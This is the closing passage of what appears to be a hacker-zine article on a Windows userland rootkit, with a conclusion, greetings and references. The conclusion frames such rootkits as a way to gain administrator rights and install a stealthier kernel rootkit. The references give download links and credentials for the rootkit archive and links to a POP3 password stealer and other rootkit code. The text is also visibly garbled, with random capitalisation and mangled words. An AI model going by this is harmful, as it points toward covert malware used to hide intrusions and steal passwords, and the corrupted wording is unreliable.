Paper Are The Result of long research and Experimentations. It Shows Up That Ring 3 Rootkit Are An Effective THREAT For NowADays Computer Systems But May Be Defeated by a Clever Analysis of The Weakpoints They Target. so this type of rootkit isn't Perfect as data May Still Be Detected, Even Though They're from Far More Difficult To KEEP IN MING That The Most Important Thing is Not to Cause Suspicion, and therefore not be detected. in A Word, Ring 3 Rootkits Are Perfect Meantime To Get Administrative Privilege on The local machine and Install a Most Adapted Ring 0 Rootkit That Will Be More Suitable to Reach The maximum stealth. ------- [5.2. Greets "If I have seen further it is by standard over the shouth of giants." This quotation from isaac newton (1676) Perfectly Describes the Ways Things Work. Therefore, My Thanks First Go To All Authors That Make The Internet A Place of Free Information and Exchanges. with Exchanges. Without Them you Would Probably NOT BE Reading these Lines. this is especially true for ivo Ivanov - Thanks to you i discovered the world of api hooking -, crazylord WHO Provided Me Precious Information TO SET UP My First Device DRIVER, HOLY_FATHER AND Eclips for considering Some Questions About Userland Take over, added to what, ingit to thank my friends and revisers That Helped Me Set Up A More Accessible Paper. I Hope this Goal Is Achieved.FinalLinally, I Salute My Friends and Teammates; you know who you are. Special Thanks to My Buddy and Personal UNIX Consultant Artyc. That's all folks! "I Tried So Hard, And Gone So Far. But in the end, IT Doesn't Even Matter ... " KDM Kodmaker@syshell.org http://www.syshell.org/ ------- [6. References - [1] http://www.syshell.org/?r=../phrack62/ntillusion_fullpack.txt - [NTILLUSION rootkit] http://www.systemhell.org/?r=../phrack62/ntillusion.rar Login / Pass: PhrackReaders / Ph4e # HO5 Rar Password: 0Wnd4Wurld - [Hidingen] http://rootkit.host.sk/knowhow/hidingen.txt - [hooks] ahowtting system wide hooks Http://www.codeguru.com/cpp/w-p/system/misc/article.php/c5685/ - [MSDN_HOOKS] http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/winui/ WindowsuserInterface / Windowing / Hooks.asp - [3WAYS] Three Ways to inject your code INTO Another Process Http://www.codeguru.com/cpp/w-p/system/procesModules/Article.php/c5767/ - [LSD] Win32 Assembly Components http://www.lsd-pl.net/documents/winasm-1.0.1.pdf - [THCONTEXT] GetthreadContext Remote Code Triggering Proof of Concept http://www.syshell.org/?r=rootkit/code_injection/getsetthreadContex/kctxin JECT / - [RemoteTh] http://win32.mvps.org/processes/remthread.html - [PE] http://www.syshell.org/?r=rootkit/pe/doc/mattpietrek - [Ivanov] Http://www.codeguru.com/cpp/w-p/system/misc/article.php/c5667/ - [Unleashed] http://www.codeproject.com/system/api_monitoring_unleashed.asp - [DETOTOTOURS] DETOURS WIN32 FUNCTIONS Interception Http://research.microsoft.com/sn/detours/ [HKDEF_RTK] HACKER Defender rootkit http://rootkit.host.sk/ - [HKDEF] HACKER Defender (HOLY_FATHER 2002) http://rootkit.host.sk/knowhow/hookingin.txt - [Zombie2] Entry Point ReWriting Http://www.syshell.org/?r=rootkit/api_hijack/code/entrypointrewritting/ - [Exploriat] http://www.syshell.org/?r=rootkit/snippets/exploreriat2k.log - [MSDN] Microsoft Developers Network http://msdn.microsoft.com/library/ - [NTQuerySystemInformation] http://msdn.microsoft.com/library/default.asp?url=/library/en- US / Sysinfo / Base / NTQuerySystemInformation.asp - [Gettcp] gettcptable http://msdn.microsoft.com/library/default.asp?url=/library/en- US / IPHLP / IPHLP / GETTCPTABLE.ASP - [NetStatp] NetStat Like http://www.sysinternals.com/files/netstatp.zip - [ksentinel] POP3 Passwords Grabber http://www.syshell.org/?r=rootkit/releases/pop3_stealer/ksentinel/ksentine L.c - [Fport] NetWork Tool Http://foundstone.com/resources/freetools/fport.zip - [TCPVIEW] NetWork Tool http://www.sysinternals.com/ntw2k/source/tcpview.shtml - [Listdlls] DLL LISTING TOOL Http://www.sysinternals.com/ntw2k/freeware/listdlls.shtml - [ProceXP] Process Explorer http://www.sysinternals.com/ntw2k/freeware/procexp.shtml - [vice] catch hookers! http://www.rootkit.com - [PEB] Http://undocumented.ntinternals.net/usermode/undocument functions/NT%2 0Objects / Process / Peb.html - [pebshlcde] http://madchat.org/coding/w32nt.rev/rw32gs.txt | = [EOF] = ------------------------------------------------------------------------------------------------------------------------ ------------------- = |
